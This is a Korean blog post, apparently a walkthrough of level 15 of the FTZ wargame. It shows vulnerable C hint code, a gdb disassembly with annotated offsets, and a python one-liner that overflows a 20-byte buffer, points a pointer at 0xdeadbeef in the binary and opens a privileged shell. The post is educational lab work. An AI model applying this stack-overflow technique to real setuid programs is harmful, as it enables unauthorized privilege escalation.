보안_기타/ftz
ftz 15
정지홍
2024. 8. 22. 00:05
192.168.174.128
Level15 Password is "guess what".
[level15@ftz level15]$ cat hint
#include <stdio.h>
main()
{ int crap;
int *check;
char buf[20];
fgets(buf,45,stdin);
if (*check==0xdeadbeef)
{
setreuid(3096,3096);
system("/bin/sh");
}
}[level15@ftz level15]$ gdb attackme
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x08048490 <main+0>: push ebp
0x08048491 <main+1>: mov ebp,esp
0x08048493 <main+3>: sub esp,0x38 # 56bytes
0x08048496 <main+6>: sub esp,0x4 # 4bytes
0x08048499 <main+9>: push ds:0x8049664 # 여기가 buf실주소
0x0804849f <main+15>: push 0x2d # 45bytes
0x080484a1 <main+17>: lea eax,[ebp-56] # buf의 시작주소로 보임
0x080484a4 <main+20>: push eax
0x080484a5 <main+21>: call 0x8048360 <fgets>
0x080484aa <main+26>: add esp,0x10
0x080484ad <main+29>: mov eax,DWORD PTR [ebp-16]
0x080484b0 <main+32>: cmp DWORD PTR [eax],0xdeadbeef
0x080484b6 <main+38>: jne 0x80484dd <main+77>
0x080484b8 <main+40>: sub esp,0x8
0x080484bb <main+43>: push 0xc18
0x080484c0 <main+48>: push 0xc18
0x080484c5 <main+53>: call 0x8048380 <setreuid>
0x080484ca <main+58>: add esp,0x10
0x080484cd <main+61>: sub esp,0xc
0x080484d0 <main+64>: push 0x8048548
0x080484d5 <main+69>: call 0x8048340 <system>
0x080484da <main+74>: add esp,0x10
---Type <return> to continue, or q <return> to quit---
0x080484dd <main+77>: leave
0x080484de <main+78>: ret
0x080484df <main+79>: nop
End of assembler dump.여기는 포인터이니 40으로 채워주고 주소값을 넣어줘야함
(gdb) x/40x 0x008048492
0x8048492 <main+2>: 0x38ec83e5 0xff04ec83 0x04966435 0x8d2d6a08
0x80484a2 <main+18>: 0xe850c845 0xfffffeb6 0x8b10c483 0x3881f045
0x80484b2 <main+34>: 0xdeadbeef 0xec832575 0x0c186808 0x18680000
0x80484c2 <main+50>: 0xe800000c 0xfffffeb6 0x8310c483 0x48680cec
0x80484d2 <main+66>: 0xe8080485 0xfffffe66 0xc910c483 0x895590c3
0x80484e2 <__do_global_ctors_aux+2>: 0xec8353e5 0x962ca104 0x2cbb0804 0x83080496
0x80484f2 <__do_global_ctors_aux+18>: 0x1674fff8 0x8d00768d 0x000027bc 0xeb830000
0x8048502 <__do_global_ctors_aux+34>: 0x8bd0ff04 0xfff88303 0x5b58f475 0x8955c35d
0x8048512 <init_dummy+2>: 0x08ec83e5 0xc35dec89 0x0000b68d 0x89550000
0x8048522 <_fini+2>: 0xe85253e5 0x00000000 0x12c3815b 0x8d000011[level15@ftz level15]$ (python -c 'print"a"*40+ "\xb2\x84\x04\x08"'; cat ) | ./attackme
my-pass
Level16 Password is "about to cause mass".